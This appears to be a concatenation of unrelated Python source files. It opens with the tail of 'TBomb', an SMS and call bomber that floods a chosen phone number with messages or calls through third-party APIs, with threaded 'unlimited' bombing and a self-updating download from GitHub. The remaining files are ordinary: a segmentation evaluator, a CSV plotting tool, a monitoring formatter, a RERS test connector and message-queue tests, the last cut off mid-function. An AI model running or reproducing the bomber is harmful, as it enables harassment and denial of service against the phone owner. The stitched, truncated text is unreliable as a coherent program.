'\n\n\tWe Are Sorry To Say That Bombing Limit For Your Country Has Been Reached...')
print(
'\nWe Are Working Too Hard To Increase The International Limit...')
input(
'\nThis will help us to give support to your country fast...\n\nPress Enter To Exit...')
os.system('rm *.xxx* > /dev/null 2>&1')
print('\n\n')
banner()
exit()
else:
print('\n\n\tSorry Your Country is Not Supported...')
print(
'\t\tPlease Send A Mail To ggspeedx29@gmail.com To Let Us Know...')
input('Press Enter To Exit...')
exit()
print(random.choice(colors))
print("==================================================================")
print(" BOMBING in progress, please wait !! ")
print(" Please keep your data connection active during bombing !! ")
print("==================================================================")
print(" Target Number : +" + str(cc) + " ", target)
print(" Number of Requests Sent : ", requested)
print(" Successful Requests : ", success)
print(" Failed Requests : ", failed)
print("==================================================================")
print(" Use this for fun, not for revenge !! ")
print(" This Bomber Was Created By SpeedX !! ")
print("==================================================================")
try:
result = getapi(target, api, cc)
except Exception:
result = False
requested = requested + 1
if result:
success = success + 1
else:
failed = failed + 1
while ch.count(api) > 0:
ch.remove(api)
time.sleep(float(delay))
if requested % 3 == 0:
checkinternet()
print(W)
print('\n\nBombing Completed..')
os.system('rm *.xxx* > /dev/null 2>&1')
banner()
exit()
def update():
stuff_to_update = ['bomber.py', '.version']
for fl in stuff_to_update:
dat = urllib.request.urlopen(
"https://raw.githubusercontent.com/TheSpeedX/TBomb/master/" + fl).read()
file = open(fl, 'wb')
file.write(dat)
file.close()
print('\n\t\tUpdated Successfull !!!!')
print('\tPlease Run The Script Again...')
exit()
clr()
banner()
try:
urllib.request.urlopen('https://www.google.com')
except Exception:
print("You are not connected To Internet!!!")
print("\tPlease Connect To Internet To Continue...\n")
input('Exiting....\n Press Enter To Continue....')
exit()
print('\tChecking For Updates...')
ver = urllib.request.urlopen(
"https://raw.githubusercontent.com/TheSpeedX/TBomb/master/.version").read().decode('utf-8')
verl = ''
try:
verl = open(".version", 'r').read()
except Exception:
pass
if ver != verl:
print('\n\t\tAn Update is Available....')
print('\tStarting Update...')
update()
print("Your Version is Up-To-Date")
print('\n\n\t\t\tStarting TBomb...\n\n')
try:
noti = urllib.request.urlopen(
"https://raw.githubusercontent.com/TheSpeedX/TBomb/master/.notify").read().decode('utf-8')
noti = noti.upper().strip()
if len(noti) > 10:
print('\n\n\tNOTIFICATION: ' + noti + '\n\n')
except Exception:
pass
while True:
pn = ""
cc = input("\tEnter Your Country Code (Without +) : ")
if '+' in cc:
tc = list(cc)
tc.remove('+')
cc = ''.join(tc)
cc = cc.strip()
pn = input("\tEnter Target Number: +" + cc + " ")
pn = remsp(pn)
if len(cc) >= 4 or len(cc) < 1:
print('\n\nInvalid Country Code..\n\t\tCountry Codes Are Generally 1-3 digits...\n')
continue
if len(pn) <= 6:
print('\n\nInvalid Phone Number..\n')
continue
for cch in str(cc + pn):
if not cch.isdigit():
print('\n\nPhone Number Must Consist Of Numbers Only\n')
continue
break
type = 0
try:
if sys.argv[1] == "call":
type = 1
except Exception:
type = 0
if type == 1:
nm = int(input("Enter Number of Calls To Send(Maximum 15): "))
if nm > 15:
print("\t\tYou Have Entered " + str(nm) +
".\n\tNormalizing Value To 15")
nm = 15
dl = float(input("Enter Delay time (in seconds) [Recommended 10 sec ] : "))
elif type == 0:
if cc == "91":
nm = int(input("Enter Number of Messages To Send(0 For Unlimited): "))
dl = float(
input("Enter Delay time (in seconds) [Recommended 2 sec ] : "))
else:
nm = int(input("Enter Number of Messages To Send: "))
dl = float(
input("Enter Delay time (in seconds) [Recommended 10 sec ] : "))
maxlim = 0
if cc == "91":
maxlim = 500
else:
maxlim = 100
if nm > maxlim:
print('\n\n\tSorry Due To Misuse Of This Script We Only Provide ' +
str(maxlim) + ' SMS At Once...\n\n')
print('Number Of SMS Has been Set To ' + str(maxlim))
nm = maxlim
if not cc.strip() == "91":
if type == 1:
print(
'\t\tSorry But Call Bombing is Currently Supported Only For Indian Numbers!!!!')
print()
input('Press Enter To Exit....')
print('\n\n')
banner()
exit()
cnt = 0
if pn.strip() == '' or dl <= 0 or nm <= 0 or cc.strip() == '' or cc.find('+') != -1:
print('\n\n\tSeems Like You Have Given Wrong Inputs...')
input('\n\t\tPress Enter To Exit...')
banner()
exit()
ch = [0, 14, 15, 16]
start(pn, nm, dl, ch, str(cc))
exit()
ch = [i for i in range(17)]
cbomb = False
if pn.strip() == '' or dl <= 0 or nm < 0:
print('\n\n\tSeems Like You Have Given Wrong Inputs...')
input('\n\t\tPress Enter To Exit...')
banner()
exit()
if type == 1:
print("NOTE: Call Bomb Might Not Work on DND Activated Numbers...\n")
print("\n\tPlease Don't Overload Call Bomb So That Is Would Work For Longer Period Of Time...")
cbomb = True
if cbomb:
chl = [100, 101, 102, 103, 104, 105, 106]
start(pn, nm, dl, chl, str(cc))
exit()
if nm == 0:
nt = int(input("\tNumber Of Threads(10 to 20) : "))
if nt <= 0 or nt >= 30:
print('\tTBomb Shows Better Result in 10 to 25 Threads\n\t\tStill Continuing....')
print("\n\nPlease Remember That This Is in Experimental Stage And Is Incredibly Fast...")
t = [None] * nt
print(random.choice(colors))
print("\n\n==================================================================")
print(" Gearing Up Bomber, please wait !! ")
print(" Please keep your data connection active during bombing !! ")
print("==================================================================")
print(" Target Number : +91", pn)
print(" Number of Threads : ", nt)
print(" Delay : ", dl)
print("==================================================================")
print(" Use this for fun, not for revenge !! ")
print(" This Bomber Was Created By SpeedX !! ")
print("==================================================================")
print(W)
input('\n\nPress CTRL+Z To STOP Bomber... \nPress Enter To Start Bomber...\n')
os.system('rm *.xxx* > /dev/null 2>&1')
print("\n\nStarting Bomb....")
for i in range(nt):
t[i] = threading.Thread(target=infinite, args=(pn, dl, ch, maxlim,))
t[i].daemon = True
t[i].start()
time.sleep(2)
ci = 0
while True:
ci += 1
l = count_inf
print(" Total Number of Requests Sent : ", l)
if int(l) > maxlim:
print('\n\n\tSorry Due To Misuse Of This Script We Only Provide ' +
str(maxlim) + ' SMS At Once...\n\n')
input('Press Enter To Exit...')
os.system('rm *xxx* > /dev/null 2>&1')
banner()
exit()
time.sleep(1)
if ci % 3 == 0:
checkinternet()
else:
start(pn, nm, dl, ch, '91')
exit()
|
evaluation.py
|
import os
import pandas as pd
import numpy as np
from PIL import Image
import multiprocessing
import argparse
categories = ['background','aeroplane','bicycle','bird','boat','bottle','bus','car','cat','chair','cow',
'diningtable','dog','horse','motorbike','person','pottedplant','sheep','sofa','train','tvmonitor']
def do_python_eval(predict_folder, gt_folder, name_list, num_cls=21, input_type='png', threshold=1.0, printlog=False):
TP = []
P = []
T = []
for i in range(num_cls):
TP.append(multiprocessing.Value('i', 0, lock=True))
P.append(multiprocessing.Value('i', 0, lock=True))
T.append(multiprocessing.Value('i', 0, lock=True))
def compare(start,step,TP,P,T,input_type,threshold):
for idx in range(start,len(name_list),step):
name = name_list[idx]
if input_type == 'png':
predict_file = os.path.join(predict_folder,'%s.png'%name)
predict = np.array(Image.open(predict_file)) #cv2.imread(predict_file)
elif input_type == 'npy':
predict_file = os.path.join(predict_folder,'%s.npy'%name)
predict_dict = np.load(predict_file, allow_pickle=True).item()
h, w = list(predict_dict.values())[0].shape
tensor = np.zeros((21,h,w),np.float32)
for key in predict_dict.keys():
tensor[key+1] = predict_dict[key]
tensor[0,:,:] = threshold
predict = np.argmax(tensor, axis=0).astype(np.uint8)
gt_file = os.path.join(gt_folder,'%s.png'%name)
gt = np.array(Image.open(gt_file))
cal = gt<255
mask = (predict==gt) * cal
for i in range(num_cls):
P[i].acquire()
P[i].value += np.sum((predict==i)*cal)
P[i].release()
T[i].acquire()
T[i].value += np.sum((gt==i)*cal)
T[i].release()
TP[i].acquire()
TP[i].value += np.sum((gt==i)*mask)
TP[i].release()
p_list = []
for i in range(8):
p = multiprocessing.Process(target=compare, args=(i,8,TP,P,T,input_type,threshold))
p.start()
p_list.append(p)
for p in p_list:
p.join()
IoU = []
T_TP = []
P_TP = []
FP_ALL = []
FN_ALL = []
for i in range(num_cls):
IoU.append(TP[i].value/(T[i].value+P[i].value-TP[i].value+1e-10))
T_TP.append(T[i].value/(TP[i].value+1e-10))
P_TP.append(P[i].value/(TP[i].value+1e-10))
FP_ALL.append((P[i].value-TP[i].value)/(T[i].value + P[i].value - TP[i].value + 1e-10))
FN_ALL.append((T[i].value-TP[i].value)/(T[i].value + P[i].value - TP[i].value + 1e-10))
loglist = {}
for i in range(num_cls):
loglist[categories[i]] = IoU[i] * 100
miou = np.mean(np.array(IoU))
loglist['mIoU'] = miou * 100
if printlog:
for i in range(num_cls):
if i%2 != 1:
print('%11s:%7.3f%%'%(categories[i],IoU[i]*100),end='\t')
else:
print('%11s:%7.3f%%'%(categories[i],IoU[i]*100))
print('\n======================================================')
print('%11s:%7.3f%%'%('mIoU',miou*100))
return loglist
def writedict(file, dictionary):
s = ''
for key in dictionary.keys():
sub = '%s:%s '%(key, dictionary[key])
s += sub
s += '\n'
file.write(s)
def writelog(filepath, metric, comment):
filepath = filepath
logfile = open(filepath,'a')
import time
logfile.write(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))
logfile.write('\t%s\n'%comment)
writedict(logfile, metric)
logfile.write('=====================================\n')
logfile.close()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--list", default='./VOC2012/ImageSets/Segmentation/train.txt', type=str)
parser.add_argument("--predict_dir", default='./out_rw', type=str)
parser.add_argument("--gt_dir", default='./VOC2012/SegmentationClass', type=str)
parser.add_argument('--logfile', default='./evallog.txt',type=str)
parser.add_argument('--comment', required=True, type=str)
parser.add_argument('--type', default='png', choices=['npy', 'png'], type=str)
parser.add_argument('--t', default=None, type=float)
parser.add_argument('--curve', default=False, type=bool)
args = parser.parse_args()
if args.type == 'npy':
assert args.t is not None or args.curve
df = pd.read_csv(args.list, names=['filename'])
name_list = df['filename'].values
if not args.curve:
loglist = do_python_eval(args.predict_dir, args.gt_dir, name_list, 21, args.type, args.t, printlog=True)
writelog(args.logfile, loglist, args.comment)
else:
l = []
for i in range(60):
t = i/100.0
loglist = do_python_eval(args.predict_dir, args.gt_dir, name_list, 21, args.type, t)
l.append(loglist['mIoU'])
print('%d/60 background score: %.3f\tmIoU: %.3f%%'%(i, t, loglist['mIoU']))
writelog(args.logfile, {'mIoU':l}, args.comment)
|
entrypoint.py
|
import json
from csv import DictReader
from datetime import datetime
from multiprocessing import Pipe, cpu_count
from pathlib import Path
from threading import Thread
from typing import Dict, Iterator, List, Optional, Tuple
import yaml # type: ignore
from click import Choice
from click.utils import echo
from pydantic import ValidationError
from pyqtgraph import (
DateAxisItem,
FillBetweenItem,
GraphicsLayoutWidget,
PlotCurveItem,
PlotItem,
mkQApp,
setConfigOptions,
)
from pyqtgraph.graphicsItems.PlotCurveItem import PlotCurveItem
from PySide6.QtGui import QIcon
from typer import Argument, Exit, Option, Typer, colors, get_app_dir, prompt, secho
from .background_processor import BackgroundProcessor
from .csv import pad_and_sample, pseudo_hash
from .csv.selector import Selected
from .interfaces import COLOR_NAME_TO_HEXA, Configuration
setConfigOptions(background="#141830", foreground="#D1D4DC", antialias=True)
ICON_PATH = Path(__file__).parent / "assets" / "icon-256.png"
app = Typer()
APP_DIR = Path(get_app_dir("csv-plot"))
FILES_DIR = APP_DIR / "files"
FILES_DIR.mkdir(parents=True, exist_ok=True)
CONFIG_PATH = APP_DIR / "config.json"
def default_configuration_directory_callback(
default_configuration_directory: Optional[Path],
):
if default_configuration_directory:
with CONFIG_PATH.open("w") as file_descriptor:
json.dump(
{
"default_configuration_directory": str(
default_configuration_directory
)
},
file_descriptor,
)
echo()
secho(
"😃 Default configuration directory set to: ",
fg=colors.BRIGHT_GREEN,
nl=False,
bold=True,
)
secho(
f"{default_configuration_directory} 😃",
fg=colors.BRIGHT_GREEN,
)
echo()
default_configuration_directory.mkdir(parents=True, exist_ok=True)
raise Exit()
def get_configuration_files(configuration_files_dirs: List[Path]) -> List[Path]:
base_files = [item for item in configuration_files_dirs if item.is_file()]
directories = [item for item in configuration_files_dirs if item.is_dir()]
extra_files = [
extra_file
for directory in directories
for extra_file in directory.iterdir()
if extra_file.suffix == ".yaml"
]
return base_files + extra_files
def get_default_configuration_files() -> Iterator[Path]:
if not CONFIG_PATH.exists():
echo()
secho("❌ ERROR: ", fg=colors.BRIGHT_RED, bold=True, nl=False)
secho(
"No configuration file provided and "
"no default configuration directory defined ❌",
fg=colors.BRIGHT_RED,
)
secho(
"You can either use a configuration file or directory with `-c` or "
"`--configuration-file-or-directory` option, or define default "
"configuration directory with:",
bold=True,
)
secho(
"$ csv-plot --set-default-configuration-directory",
bold=True,
fg=colors.CYAN,
)
echo()
raise Exit()
with CONFIG_PATH.open("r") as file_descriptor:
configuration = json.load(file_descriptor)
return (
path
for path in Path(configuration["default_configuration_directory"]).iterdir()
if path.suffix == ".yaml"
)
@app.command()
def main(
csv_path: Path = Argument(
...,
help="CSV file to plot. This file must contain a header.",
exists=True,
file_okay=True,
dir_okay=False,
resolve_path=True,
),
configuration_files_dirs: Optional[List[Path]] = Option(
None,
"-c",
"--configuration-files-or-directories",
help=(
"A list of configuration files or directories containing configuration "
"files. You can specify only one configuration file, or one directory, or "
"mix of files and directories... If a directory is specified, CSV Plot "
"explores recursively all subdirectories to find configuration files. If "
"several configuration files match the CSV file, then CSV Plot ask you "
"which one you want to use."
),
exists=True,
file_okay=True,
dir_okay=True,
resolve_path=True,
show_default=False,
),
set_default_configuration_directory: Optional[Path] = Option(
None,
help=(
"Set a default directory where CSV Plot will recursively look for "
"configuration files. Once done, no need to specify configuration file any "
"more. If a configuration file is specified at launch while a default "
"directory is specified, then the configuration file will supersede the "
"default directory."
),
file_okay=False,
dir_okay=True,
resolve_path=True,
is_eager=True,
callback=default_configuration_directory_callback,
),
):
"""🌊 CSV Plot - Plot CSV files without headaches! 🏄
CSV Plot is a tool to efficiently plot your CSV files.
You define a YAML configuration file which specify how your CSV file should be
plotted (layout, colors, legend, units, etc...) and CSV Plot handles the heavy work
for you.
CSV Plot does respect your computer memory. This means CSV Plot only loads into
memory the portion of file which has to be plotted. CSV Plot is able to plot files
which are bigger than your memory, and has been tested with file larger than 100GB.
"""
# Get CSV file columns names corresponding to floats
def is_castable_to_float(value: str) -> bool:
try:
float(value)
return True
except ValueError:
return False
with csv_path.open() as csv_file:
reader = DictReader(csv_file)
first_row = next(reader)
columns = {name for name, value in first_row.items() if is_castable_to_float(value)}
# Get configurations files
configuration_files = (
get_configuration_files(configuration_files_dirs)
if configuration_files_dirs
else get_default_configuration_files()
)
# Get configurations which could correspond to the CSV file
configuration_file_to_configuration_dict_maybe_none = {
configuration_file: yaml.load(
configuration_file.open("r"), Loader=yaml.FullLoader
)
for configuration_file in configuration_files
}
# If a YAML file is empty, then it will be parsed as `None`. It has to be filtered
configuration_file_to_dict = {
configuration_file: configuration_dict
for configuration_file, configuration_dict in configuration_file_to_configuration_dict_maybe_none.items()
if configuration_dict is not None
}
try:
configuration_file_to_configuration = {
configuration_file: Configuration(**configuration_dict)
for configuration_file, configuration_dict in configuration_file_to_dict.items()
}
except ValidationError as e:
secho("ERROR:", fg=colors.BRIGHT_RED, bold=True)
secho(str(e), fg=colors.BRIGHT_RED)
raise Exit()
matching_file_to_configuration = {
configuration_file: configuration
for configuration_file, configuration in configuration_file_to_configuration.items()
if configuration.variables <= columns
}
if len(matching_file_to_configuration) == 0:
secho(
"❌ ERROR: ",
fg=colors.BRIGHT_RED,
bold=True,
nl=False,
)
secho(
"No configuration file matching with CSV columns found ❌",
fg=colors.BRIGHT_RED,
)
raise Exit()
elif len(matching_file_to_configuration) == 1:
chosen_configuration, *_ = matching_file_to_configuration.values()
else:
matching_files_configurations = list(matching_file_to_configuration.items())
matching_files, configurations = zip(*matching_files_configurations)
secho(
"Multiple configuration files correspond:",
fg=colors.BRIGHT_GREEN,
bold=True,
)
for index, matching_file in enumerate(matching_files):
secho(
f"{index} - {matching_file}",
fg=colors.BRIGHT_YELLOW,
)
choice = prompt(
"Choose which one you want to use",
type=Choice([str(item) for item in range(len(matching_files))]),
show_choices=False,
)
chosen_configuration = configurations[int(choice)]
x = chosen_configuration.general.variable
secho("Process CSV file... ", fg=colors.BRIGHT_GREEN, bold=True, nl=False)
pad_and_sample(csv_path, FILES_DIR, x, cpu_count())
secho("OK", fg=colors.BRIGHT_GREEN, bold=True)
win = GraphicsLayoutWidget(show=True, title=f"🌊 CSV PLOT 🏄")
win.showMaximized()
first_plot: Optional[PlotItem] = None
variable_to_low_high: Dict[str, Tuple[PlotCurveItem, PlotCurveItem]] = {}
def get_plot(layout_item: Configuration.LayoutItem) -> PlotItem:
plot: PlotItem = win.addPlot(
row=layout_item.x - 1,
col=layout_item.y - 1,
title=layout_item.title,
axisItems=(
{"bottom": DateAxisItem()}
if chosen_configuration.general.as_datetime
else {}
),
)
plot.showGrid(x=True, y=True)
plot.setLabel(
"bottom",
text=chosen_configuration.general.label,
units=chosen_configuration.general.unit,
)
plot.setLabel(
"left",
text=layout_item.label,
units=layout_item.unit,
)
return plot
position_to_plot: Dict[Tuple[int, int], PlotItem] = (
{
(layout_item.x, layout_item.y): get_plot(layout_item)
for layout_item in chosen_configuration.layout
}
if chosen_configuration.layout is not None
else {}
)
for curve in chosen_configuration.curves:
color = COLOR_NAME_TO_HEXA[curve.color]
low = PlotCurveItem(pen=color)
high = PlotCurveItem(pen=color)
fill = FillBetweenItem(low, high, color)
if not (curve.x, curve.y) in position_to_plot:
position_to_plot[(curve.x, curve.y)] = get_plot(
Configuration.LayoutItem(position=f"{curve.x}-{curve.y}")
)
plot = position_to_plot[(curve.x, curve.y)]
plot.addItem(low)
plot.addItem(high)
plot.addItem(fill)
variable_to_low_high[curve.variable] = low, high
first_plot, *plots = position_to_plot.values()
for plot in plots:
plot.setXLink(first_plot)
date_time_formats = chosen_configuration.general.date_time_formats
def date_time_parser(x: str, date_time_formats: List[str]) -> datetime:
for date_time_format in date_time_formats:
try:
return datetime.strptime(x, date_time_format)
except ValueError:
pass
raise ValueError(
f"time data '{x}' does not match any format in " "{date_time_formats}"
)
parser = (
(lambda x: date_time_parser(x, date_time_formats))
if date_time_formats is not None
else float
)
connector, background_connector = Pipe()
background_processor = BackgroundProcessor(
FILES_DIR / pseudo_hash(csv_path, x),
(x, parser), # type: ignore
list(chosen_configuration.variables),
background_connector,
)
def on_sig_x_range_changed():
x_range, _ = first_plot.viewRange()
x_min, x_max = x_range
connector.send((x_min, x_max, int(first_plot.width())))
def update():
while True:
item: Optional[Tuple[List[float], Dict[str, Selected.Y]]] = connector.recv()
if item is None:
return
xs, variable_to_y = item
for variable, y in variable_to_y.items():
low, high = variable_to_low_high[variable]
low.setData(xs, y.mins)
high.setData(xs, y.maxs)
update_thread = Thread(target=update)
update_thread.start()
try:
first_plot.sigXRangeChanged.connect(on_sig_x_range_changed)
background_processor.start()
connector.send((None, None, int(first_plot.width())))
app = mkQApp()
app.setWindowIcon(QIcon(str(ICON_PATH)))
app.exec()
finally:
connector.send(None)
background_processor.join()
|
maas_telegraf_format.py
|
#!/usr/bin/env python
# Copyright 2017, Rackspace US, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in witing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import multiprocessing
import os
import re
import yaml
BASE_PATH = '/etc/rackspace-monitoring-agent.conf.d'
RUN_VENV = '/usr/lib/rackspace-monitoring-agent/plugins/run_plugin_in_venv.sh'
CFG_FILE = '/etc/maas_telegraf_format.yml'
RETURN_QUEUE = multiprocessing.Queue()
class Runner(object):
def __init__(self):
self.queue = multiprocessing.JoinableQueue()
self.processes = [
multiprocessing.Process(target=self.run_details)
for _ in range(2)
]
for p in self.processes:
p.start()
def put(self, item):
self.queue.put(item)
def run_details(self):
while True:
detail_args = self.queue.get()
if not detail_args:
break
detail_args.insert(0, RUN_VENV)
detail_args.insert(2, '--telegraf-output')
RETURN_QUEUE.put(' '.join(detail_args).strip())
self.queue.task_done()
def terminate(self):
self.queue.join()
for p in self.processes:
p.terminate()
def str2bool(boolean):
if boolean.lower() in ("yes", "true", "1"):
return True
elif boolean.lower() in ("no", "false", "0"):
return False
else:
raise BaseException('Not a Boolean')
def load_yaml(check_file):
with open(check_file) as f:
return yaml.safe_load(f.read())
def main():
pattern = load_yaml(CFG_FILE)['include_pattern']
r = Runner()
try:
for _, _, items in os.walk(BASE_PATH):
for item in items:
# we take an allow everything except
# approach here. By default
# allow .*
# dont want to allow file names that being with
# rally? try this:
# ^(?!rally).*
match = re.match(pattern=pattern, string=item)
if match is None:
continue
check_load = load_yaml(os.path.join(BASE_PATH, item))
if not str2bool(boolean=check_load.get('disabled')):
details = check_load.get('details')
if isinstance(details, dict) and 'args' in details:
r.put(item=details['args'])
finally:
r.terminate()
q_items = list()
while True:
try:
q_item = RETURN_QUEUE.get(timeout=1)
except Exception:
break
else:
q_items.append(q_item)
# Print a sorted list of commands
print('\n'.join(sorted(q_items)))
if __name__ == '__main__':
main()
|
rersconnector.py
|
from suls.sul import SUL
import pexpect
from subprocess import check_output
import re
from abc import ABC, abstractmethod
from typing import Tuple
import threading
import time
# Restarting a process with pexpect takes a long time,
# So lets try creating a pool-ish thing that starts
# Them in the background, so they're ready to go when
# We need em
class PexpectPool:
def __init__(self, path, n):
self.path = path
self.n = n
self.cur_idx = 0
self.processes = [None]*n
self.available = [False]*n
self._lock = threading.Lock()
threads = []
for i in range(n):
print('starting', i)
threads.append(threading.Thread(target=self._start, args=(i,)))
threads[i].start()
print('started', i)
for thread in threads:
print("started", thread)
thread.join()
def get(self):
with self._lock:
# Find the nearest slot that is ready to go
while True not in self.available:
time.sleep(0.01)
idx = self.available.index(True)
self.available[idx] = False
print('[CHECKOUT]', idx)
# Create a new process in the background soon
threading.Timer(0.5, self._start, args=[idx]).start()
return self.processes[idx]
def _start(self, index):
self.processes[index] = pexpect.spawn(self.path, encoding='utf-8')
self.available[index] = True
def reset(self, process):
threading.Thread(target=process.terminate)
# This class serves as an adaptor to the RERS 2019 problems
# It uses pexpect to interact with the compiled c programs
# It also provides early stopping functionality for queries known
# to be prefixed by invalid input or hitting a verifier error
class RERSConnector(SUL, ABC):
def __init__(self, path_to_binary):
self.path = path_to_binary
self.pool = PexpectPool(self.path, 10)
self.p = self.pool.get()
self.needs_reset = True
self.cache = {}
@abstractmethod
def _interact(self, inputs):
pass
@abstractmethod
def _checkinvalidprefixes(self, inputs) -> Tuple[bool, object]:
pass
def process_input(self, inputs):
inputs = tuple(inputs)
print("[Query]", inputs)
# Check if the input is already in cache
if inputs in self.cache.keys():
self.needs_reset = False
print("[Cache hit]")
return self.cache[inputs]
# Check prefixes
hit, result = self._checkinvalidprefixes(inputs)
if hit:
return result
# If no cache hit, actually send the input to the SUT
return self._interact(inputs)
def reset(self):
if self.needs_reset:
print("[Reset]")
self.pool.reset(self.p)
self.p = self.pool.get()
def get_alphabet(self):
# Grep the source file for the line defining the input alphabet
tmp = check_output(["grep", "-o", "int inputs\[\] \= {\(.*\)};", f"{self.path}.c"])
# Extract it and put it into a list
return re.search('{(.*)}', tmp.decode()).group(1).split(',')
# Connects and interacts with the RERS programs, returning booleans for DFA learning
# True is returned on a verifier error (so these turn into an accepting state)
# False is returned otherwise
class BooleanRERSConnector(RERSConnector):
def __init__(self, path_to_binary):
super().__init__(path_to_binary)
self.invalid_prefixes = set()
self.error_hit_prefixes = set()
def _checkinvalidprefixes(self, inputs):
for i in range(len(inputs)):
curprefix = inputs[0:i+1]
# Check if a prefix of the current input sequence has already been invalidated
if curprefix in self.invalid_prefixes:
print("[Skipped - Invalid prefix]")
self.needs_reset = False
#self.cache[inputs] = False
return True, False
# Check if a prefix of the current input already hit a verifier error
if curprefix in self.error_hit_prefixes:
print("[Skipped - Verifier error found]")
self.needs_reset = False
#self.cache[inputs] = True
return True, True
# Or, if no cache hit:
return False, None
# Performs the interaction with the RERS SUT
def _interact(self, inputs):
for input in inputs:
self.needs_reset = True
print("[Send]", input)
self.p.sendline(input)
index = self.p.expect([
'[0-9]+\r\n([0-9]+)\r\n',
'Invalid input:.*$'
])
# We have an accepted input or a verifier error
if index == 0:
# Keep track of the matched regex in case we need to still print it
prev_match = self.p.match
# Check if we have hit a verifier error
idx_2 = self.p.expect(['error_[0-9]+', pexpect.TIMEOUT], timeout=0.05)
if idx_2 == 0:
print("[OK]", prev_match.group(1))
print("[Verifier ERROR]", self.p.match.group(0))
self.error_hit_prefixes.add(inputs)
self.cache[inputs] = True
return True
else:
print("[OK]", prev_match.group(1))
# We have an invalid input
elif index == 1:
print("[ERROR]", self.p.match.group(0))
self.invalid_prefixes.add(inputs)
self.cache[inputs] = False
return False
# Or we got through the entire input string without hitting a verifier error / invalid input
self.cache[inputs] = False
return False
# Interacts with the compiled RERS programs,
# But returns strings instead of booleans for mealy machine learning.
class StringRERSConnector(RERSConnector):
def __init__(self, path_to_binary):
super().__init__(path_to_binary)
self.invalid_prefixes = {}
self.error_hit_prefixes = {}
def _checkinvalidprefixes(self, inputs):
for i in range(len(inputs)):
curprefix = inputs[0:i+1]
# Check if a prefix of the current input sequence has already been invalidated
if curprefix in self.invalid_prefixes.keys():
print("[Skipped - Invalid prefix]")
result = self.invalid_prefixes[curprefix]
self.needs_reset = False
#self.cache[inputs] = result
return True, result
# Check if a prefix of the current input already hit a verifier error
if curprefix in self.error_hit_prefixes.keys():
print("[Skipped - Verifier error found]")
result = self.error_hit_prefixes[curprefix]
self.needs_reset = False
#self.cache[inputs] = result
return True, result
# Or, if no cache hit:
return False, None
def _interact(self, inputs):
# Keep track of what the last response from the SUT was
result = None
for input in inputs:
self.needs_reset = True
print("[Send]", input)
self.p.sendline(input)
index = self.p.expect([
'[0-9]+\r\n([0-9]+)\r\n',
'Invalid input:.*$'
])
# We have an accepted input or a verifier error
if index == 0:
# Keep track of the matched regex in case we need to still print it
prev_match = self.p.match
# Check if we have hit a verifier error
idx_2 = self.p.expect(['error_[0-9]+', pexpect.TIMEOUT], timeout=0.05)
if idx_2 == 0:
result = self.p.match.group(0)
print("[OK]", prev_match.group(1))
print("[Verifier ERROR]", result)
self.error_hit_prefixes[inputs] = result
self.cache[inputs] = result
return result
else:
result = prev_match.group(1)
print("[OK]", result)
# We have an invalid input
elif index == 1:
result = "invalid_input"
print("[ERROR]", self.p.match.group(0))
self.invalid_prefixes[inputs] = result
self.cache[inputs] = result
return result
# Or we got through the entire input string without hitting a verifier error / invalid input
self.cache[inputs] = result
return result
if __name__ == "__main__":
r = BooleanRERSConnector('../rers/TrainingSeqReachRers2019/Problem11/Problem11')
alphabet = r.get_alphabet()
from numpy.random import choice
input = list(choice(alphabet, 200))
input = ["9", "10"]
print("Sending", input)
result = r.process_input(input)
print("Result:", result)
print("DONE")
|
reliability_tests.py
|
import imp
import sys
import threading
import time
from amqpstorm import AMQPConnectionError
from amqpstorm import AMQPMessageError
from amqpstorm import Connection
from amqpstorm import UriConnection
from amqpstorm import compatibility
from amqpstorm.tests import HOST
from amqpstorm.tests import PASSWORD
from amqpstorm.tests import URI
from amqpstorm.tests import USERNAME
from amqpstorm.tests.utility import TestFunctionalFramework
from amqpstorm.tests.utility import setup
class ReliabilityFunctionalTests(TestFunctionalFramework):
@setup(new_connection=False, queue=True)
def test_functional_open_new_connection_loop(self):
for _ in range(25):
self.connection = self.connection = Connection(HOST, USERNAME,
PASSWORD)
self.channel = self.connection.channel()
# Make sure that it's a new channel.
self.assertEqual(int(self.channel), 1)
self.channel.queue.declare(self.queue_name)
# Verify that the Connection/Channel has been opened properly.
self.assertIsNotNone(self.connection._io.socket)
self.assertIsNotNone(self.connection._io.poller)
self.assertTrue(self.connection.is_open)
self.channel.close()
self.connection.close()
# Verify that the Connection has been closed properly.
self.assertTrue(self.connection.is_closed)
self.assertIsNone(self.connection._io.socket)
self.assertIsNone(self.connection._io.poller)
self.assertFalse(self.connection._io._running.is_set())
self.assertFalse(self.connection.exceptions)
@setup(new_connection=False, queue=True)
def test_functional_open_close_connection_loop(self):
self.connection = Connection(HOST, USERNAME, PASSWORD, lazy=True)
for _ in range(25):
self.connection.open()
channel = self.connection.channel()
# Make sure that it's a new channel.
self.assertEqual(int(channel), 1)
channel.queue.declare(self.queue_name)
channel.close()
# Verify that the Connection/Channel has been opened properly.
self.assertIsNotNone(self.connection._io.socket)
self.assertIsNotNone(self.connection._io.poller)
self.assertTrue(self.connection.is_open)
self.connection.close()
# Verify that the Connection has been closed properly.
self.assertTrue(self.connection.is_closed)
self.assertIsNone(self.connection._io.socket)
self.assertIsNone(self.connection._io.poller)
self.assertFalse(self.connection._io._running.is_set())
self.assertFalse(self.connection.exceptions)
@setup(new_connection=True, new_channel=False, queue=True)
def test_functional_close_gracefully_after_publish_mandatory_fails(self):
for index in range(3):
channel = self.connection.channel()
# Try to publish 25 bad messages.
for _ in range(25):
try:
channel.basic.publish('', self.queue_name, '', None, True,
False)
except AMQPMessageError:
pass
# Sleep for 0.1s to make sure RabbitMQ has time to catch up.
time.sleep(0.1)
self.assertTrue(channel.exceptions)
channel.close()
@setup(new_connection=False, queue=True)
def test_functional_open_close_channel_loop(self):
self.connection = self.connection = Connection(HOST, USERNAME,
PASSWORD)
for _ in range(25):
channel = self.connection.channel()
# Verify that the Channel has been opened properly.
self.assertTrue(self.connection.is_open)
self.assertTrue(channel.is_open)
# Channel id should be staying at 1.
self.assertEqual(int(channel), 1)
channel.close()
# Verify that theChannel has been closed properly.
self.assertTrue(self.connection.is_open)
self.assertTrue(channel.is_closed)
